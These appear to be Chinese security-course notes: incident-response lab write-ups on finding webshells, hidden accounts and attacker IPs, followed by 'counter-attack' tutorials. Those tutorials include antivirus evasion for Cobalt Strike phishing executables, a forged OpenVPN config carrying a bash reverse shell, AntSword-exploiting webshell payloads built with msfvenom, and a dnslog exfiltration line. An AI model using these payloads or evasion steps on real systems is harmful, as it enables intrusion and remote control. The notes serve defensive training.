知攻善防-Web2
一、背景小李在某单位驻场值守,深夜12点,甲方已经回家了,小李刚偷偷摸鱼后,发现安全设备有告警,于是立刻停掉了机器开始排查。这是他的服务器系统,请你找出以下内容,并作为通关条件:
靶机密码:Zgsf@qq.com
攻击者的IP地址(两个)?攻击者的webshell文件名?攻击者的webshell密码?攻击者的伪QQ号?攻击者的伪服务器IP地址?攻击者的服务器端口?攻击者是如何入侵的(选择题)?
二、IP1仍然是phpstudy,直接查看apache的日志,通过日志看到攻击者的ip1为:
攻击者IP:192.168.126.135
三、webshell名字直接把日志拉到最后从后往前看,发现webshell名字为:system.php
上传的木马名为:system.php
四、webshell密码根据文件名直接在www目录下,找到文件,查看文件内容
连接密码为:hack6618
五、隐藏用户个人习惯,如果有webshell的话,会先看看是否有隐藏用户
lusrmgr.msc
...
知攻善防-Web3
一、背景前景需要:小苕在省护值守中,在灵机一动情况下把设备停掉了,甲方问:为什么要停设备?小苕说:我第六感告诉我,这机器可能被黑了。
这是他的服务器,请你找出以下内容作为通关条件:
1. 攻击者的两个IP地址2. 隐藏用户名称3. 黑客遗留下的flag【3个】
相关账户密码:
Windows:administrator/xj@123456
二、IP看到了phpstduy,第一步先查看中间件日志,
在日志中找到了两个ip
192.168.75.129192.168.75.130
日志分析工具中也可以看到一个ip
192.168.75.130
三、隐藏用户cmd中输入这个命令,或者使用lusrmgr.msc也可以看到
net localgroup users
发现隐藏用户
hack6618
四、flag排查定时任务,
taskschd.msc
在定时任务描述中找到第一个flag
flag{zgsfsys@sec}
继续排查,查看定时任务具体的任务,找到执行的bat路径
根据路径,找到文件,打开找到第二个flag
flag{888666abc}
第三个fl ...
知攻善防-Web1
一、背景:靶机来源:至善攻防实验室
小李在值守的过程中,发现有CPU占用飙升,出于胆子小,就立刻将服务器关机,这是他的服务器系统,请你找出以下内容,并作为通关条件:
1.攻击者的shell密码2.攻击者的IP地址3.攻击者的隐藏账户名称4.攻击者挖矿程序的矿池域名(仅域名)
二、攻击者的shell密码发现有phpstudy,发现有apache和nginx这两个中间件
分别查看一下访问日志,nginx的访问日志为空,发现使用的apache这个中间件,
打开访问日志,直接拉到最后面
很明显找到上传的webshell路径
在/content/plugins/tips/shell.php这个路径下
密码为:rebeyond
三、攻击者ip
同样看日志
发现ip 为
192.168.126.1
三、隐藏的账号方法一net localgroup users
加$的就是隐藏账号
方法二
四、 挖矿的域名这个需要对exe进行反编译,没怎么接触过逆向,参考网上笔记写的
排查上面找到隐藏账号的目录,发现kaung.exe文件,运行后cpu拉满, ...
钓鱼反制
一、钓鱼邮件钓鱼邮件一般采用远程控制后门木马(毕竟攻防演练中整个具有破坏性的病毒时违反演练归档的)
1.1、钓鱼文件生成
cobaltstrie生成钓鱼文件
1.1.1、普通exe
1.2、exe免杀
因为杀毒软件病毒库几乎每周都会更新,免杀技术时效性很强
1.2.1、常见查杀方式
静态查杀:对文件进行特征匹配的思路
云查杀:对文件内容及行为的检测
动态查杀:对其产生的行为进行检测
1.2.2、加壳
部分杀毒软件会将加壳后的程序视为恶意文件
利用特殊的算法,度可执行文件里的资源进行压缩,只不过这个压缩,只不过这个压缩文件,可以独立运行,解压过程完全隐蔽,都在内存中完成。windows平台常见的壳如upx(压缩壳)、vmp(虚拟机壳)、穿山甲(加密壳)
themida:通过加密、虚拟化、防调试等技术来保护Windows程序的安全性和可控性。但加壳后的程序在部分系统上可能会运行失败(任何形式的加密混淆都可能导致无法运行)。
不加壳之前,火绒秒杀
直接把生成的exe拉到themia中
点击protect
加壳成功后,火绒没有查杀出来
1.3、shellcode加载器she ...
C2反制
一、cobaltstrie简介
所用的工具和脚本
https://wudao3579.oss-cn-beijing.aliyuncs.com/tools/cobaltstrike4.3.zip
https://wudao3579.oss-cn-beijing.aliyuncs.com/tools/CobaltStrikeParser.zip、
https://wudao3579.oss-cn-beijing.aliyuncs.com/tools/CS_fakesubmit.zip
Cobalt Strike(简称为CS)是一款团队作战渗透测试神器,是一种可以用来进行横向移动、数据窃取、鱼叉式钓鱼的后渗透工具,分为客户端和服务端,一个客户端可以连接多个服务端,一个服务端也可以对应多个客户端连接。
cobaltsrike运行需要java运行环境
1.1、服务端
服务端是sh脚本,需要在Linux操作系统上执行
chmod +x teamserver./teamserver [server_ipaddress] [password]
192.168.43.128是CS服务端的 ...
常见配置文件反制
一、Openvpn反制openvpn是常见的vpn服务,通过信息泄露、漏洞攻击或钓鱼获取vpn配置文件直接攻入内网,是红队渗透测试常用的技术。
1.1、linux
伪造openvpn配置文件1.open
remote 192.168.31.137ifconfig 10.200.0.2 10.200.0.1dev tunscript-security 2up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.43.128/9090 0<&1 2>&1&'"
上面所有ip地址都不用变,下面的tcp/后面的ip地址改为kali或者云服务器的,用来反弹shell,执行命令
openvpn --config 1.ovpnnc -lvvp 9090
1.2、Windowswindows并没有bash,使用powershell反弹shell的命令非常长,由于openvpn限制配置文件不能超越256个字符,故windows尚无利用方法。
当然也有例外,如果 ...
常见安全工具反制
一、蚁剑反制
AntSowrd<=2.0.7
1.1、webshell连接php -S 0.0.0.0:9991
1.2、反制antsword
课程为了演示需要,是单独创建的webshell.php 、webshell2.php 、webshell3.php实际流程是蓝队通过入侵排查发现红队传入的webshell文件,直接修改webshell文件,红队再次连接时就会中招
1.2.1、弹窗<?php header("HTTP/1.1 500 <img src=1 onerror=alert(1) />") ?>
更改webshell
更改后在连接后触发弹窗
1.2.2、反制
生成nodejs反弹shell脚本
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.43.128 LPORT=12333 -f base64
192.168.43.128是kali的IP地址
将生成的base64编码后的字符替换到下面的buffer
<?php head ...
常见攻击方法反制
一、dnslog1.1、DNSlong原理DNS在解析的时候会留下日志,这类工具就是读取多级域名的解析日志,来获取信息,简单来说就是把信息放在多级子域名中,传递到我们自己的服务器中,然后读取日志,获取特定信息,最后根据获取的信息来判断我们渗透测试的动作是否成功运行。在一些无回显的漏洞利用中,DNSlog被广泛使用。
常见的DNSLOG平台:
DNSLog Platform
DNSLOG Platform (dig.pm)
https://ceye.io/
1.2、dnslog红队应用场景DNS外带
ping `whoami`.8o5x9p.dnslog.cn
1.3、dnslog反制针对dnslog和httplog 的反制,获取到对方的payload 的url ,然后批量使用站长之家进行批量ping 或者使用腾讯云函数进行批量访问,对方列表会满满的都是请求。而且大部分dnslog显示会有上限,会不断覆盖,影响其正常使用。
多地ping:多个地点Ping服务器,网站测速 - 站长工具 (chinaz.com)
平台一般都有限制,一次最多显示10条数据,可以根据这种方式来进 ...
取证分析
一、电子取证电子取证是指利用计算机软硬件技术,以符合法律规范的方式对计算机入侵、破坏、欺诈、攻击等犯罪行为进行证据获取、保存、分析和出示的过程。从技术方面看,计算机犯罪取证是一个对受侵计算机系统进行扫描和破解,对入侵事件进行重建的过程。具体而言,是指把计算机看作犯罪现场,运用先进的辨析技术,对计算机犯罪行为进行解剖,搜寻罪犯及其犯罪证据。取证分为现场勘查阶段 和 证据分析阶段
现场勘查阶段
主要任务是获取可能的物理证据,如嫌疑人的计算机、移动硬盘、U盘、手机、数码相机、数字存储卡等各种可能包含证据的介质。
证据分析阶段
对获取的存储设备进行深入检查,发现可能的电子证据并生成报告,以便提交给法庭作为诉讼证据。
法律法规:
公安机关办理刑事案件电子数据取证规则:
http://gaj.cq.gov.cn/zslm_245/wlaqgl/flfg/201912/t20191221_2043591.html
计算机犯罪现场勘验与电子证据检查规则:
http://www.fakuyun.com/index.php?m=content&c=index&a=show ...
威胁情报和IP地位
一、威胁情报威胁情报是有关组织可能面临的潜在攻击以及如何检测阻止这些攻击的信息。执法部门有时会分发带有嫌疑人信息的“通缉”海报;同样,网络威胁情报包含有关当前威胁是什么样子以及它们来自何处的信息。在数字安全术语中,“威胁”是一种恶意行为,可能导致数据在未经许可的情况下被盗、丢失或更改。该术语指的是潜在的和实际的攻击。威胁情报使组织能够针对威胁采取行动,而不仅仅是提供数据。每一条威胁情报都有助于检测和预防攻击。某些类型的威胁情报可以输入防火墙、Web 应用程序防火墙 (WAF)、安全信息和事件管理 (SIEM) 系统以及其他安全产品,使它们能够更有效地识别和阻止威胁。其他类型的威胁情报更为通用,可帮助组织做出更大的战略决策。
微步威胁情报 https://x.threatbook.com/
奇安信威胁情报平台 https://ti.qianxin.com/
腾讯安全威胁情报平台 https://tix.qq.com/
这些平台结合使用,单个平台所显示的信息可能不全
这里以微步社区为例,
我的服务器上的资产图
使用lastb命令,随便找一个尝试爆破我ssh账号密码的服务器ip为例 ...